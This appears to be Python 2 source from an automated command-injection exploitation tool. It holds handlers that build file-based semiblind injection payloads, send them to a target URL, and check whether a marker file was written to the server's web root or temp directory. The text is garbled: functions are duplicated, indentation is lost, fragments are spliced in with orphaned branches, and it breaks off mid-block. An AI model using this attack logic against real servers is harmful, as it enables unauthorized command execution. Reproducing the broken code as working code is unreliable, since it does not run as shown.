def tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response):
if no_result == True:
sys.stdout.write("(*) Trying to upload file, on temporary directory (" + tmp_path + ")...\n")
tfb_handler.exploitation(url, delay, filename, tmp_path, http_request_method, url_time_response)
else :
sys.stdout.write("\r")
sys.stdout.flush()
def tfb_controller(no_result, url, delay, filename, tmp_path,
http_request_method, url_time_response):
if no_result == True:
sys.stdout.write(
"(*) Trying to upload file, on temporary directory (" + tmp_path +
")...\n")
tfb_handler.exploitation(url, delay, filename, tmp_path,
http_request_method, url_time_response)
else:
sys.stdout.write("\r")
sys.stdout.flush()
print ""
sys.exit(0)
else:
pass
# If temp-based technique failed,
# use the "/tmp/" directory for tempfile-based technique.
if no_result == True:
if menu.options.verbose == False:
print "[" + colors.RED + " FAILED "+colors.RESET+"]"
else:
print ""
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
tmp_upload = raw_input("(*) Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > ").lower()
if tmp_upload in settings.CHOISE_YES:
sys.stdout.write("(*) Trying to upload file, on temporary directory (" + tmp_path + ")...\n")
tfb_handler.exploitation(url,delay,filename,tmp_path,http_request_method)
else:
return False
else :
print ""
def exploitation(url,delay,filename,http_request_method):
fb_injection_handler(url,delay,filename,http_request_method)
# If temp-based technique failed,
# use the "/tmp/" directory for tempfile-based technique.
if no_result == True:
if menu.options.verbose == False:
print "[" + colors.RED + " FAILED " + colors.RESET + "]"
else:
print ""
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
tmp_upload = raw_input(
"(*) Do you want to try the temporary directory (" + tmp_path +
") [Y/n] > ").lower()
if tmp_upload in settings.CHOISE_YES:
sys.stdout.write(
"(*) Trying to upload file, on temporary directory (" +
tmp_path + ")...\n")
tfb_handler.exploitation(url, delay, filename, tmp_path,
http_request_method)
else:
return False
else:
print ""
def exploitation(url, delay, filename, http_request_method):
fb_injection_handler(url, delay, filename, http_request_method)
def fb_injection_handler(url, delay, filename, http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded = False
stop_injection = False
injection_type = "Semiblind-based Command Injection"
technique = "file-based semiblind injection technique"
sys.stdout.write(colors.BOLD + "(*) Testing the " + technique + "... " +
colors.RESET)
sys.stdout.flush()
# Print the findings to log file.
output_file = open(filename + ".txt", "a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(
random.choice(string.ascii_uppercase) for i in range(6))
# Check if defined "--base64" option.
if menu.options.base64_trick == True:
B64_ENC_TAG = base64.b64encode(TAG)
B64_DEC_TRICK = settings.B64_DEC_TRICK
else:
B64_ENC_TAG = TAG
B64_DEC_TRICK = ""
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = B64_ENC_TAG + ".txt"
sys.stdout.write("\n(*) Trying to upload the '" +
OUTPUT_TEXTFILE + "' on " +
settings.SRV_ROOT_DIR + "... ")
try:
# File-based decision payload (check if host is vulnerable).
payload = fb_payloads.decision(separator, B64_ENC_TAG,
B64_DEC_TRICK,
OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
#Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload +
colors.RESET)
# Check if target host is vulnerable.
response, vuln_parameter = fb_injector.injection_test(
payload, http_request_method, url)
# Find the directory.
path = url
path_parts = path.split('/')
count = 0
for part in path_parts:
count = count + 1
count = count - 1
last_param = path_parts[count]
output = url.replace(last_param, OUTPUT_TEXTFILE)
time.sleep(delay)
try:
# Evaluate test results.
output = urllib2.urlopen(output)
html_data = output.read()
shell = re.findall(r"" + TAG + "", html_data)
# If temp-based technique failed, use the "/tmp/" directory for tempfile-based technique.
except urllib2.HTTPError, e:
if e.getcode() == 404:
stop_injection = True
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
print colors.BGRED + "\n(x) Error: Unable to upload the '" + OUTPUT_TEXTFILE + "' on '" + settings.SRV_ROOT_DIR + "'." + colors.RESET + ""
sys.stdout.write("(*) Trying to upload the '" +
OUTPUT_TEXTFILE +
"' on temporary directory (" +
tmp_path + ")...\n")
tfb_handler.exploitation(url, delay, filename,
tmp_path,
http_request_method)
sys.exit(0)
except urllib2.URLError, e:
print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET
sys.exit(0)
except:
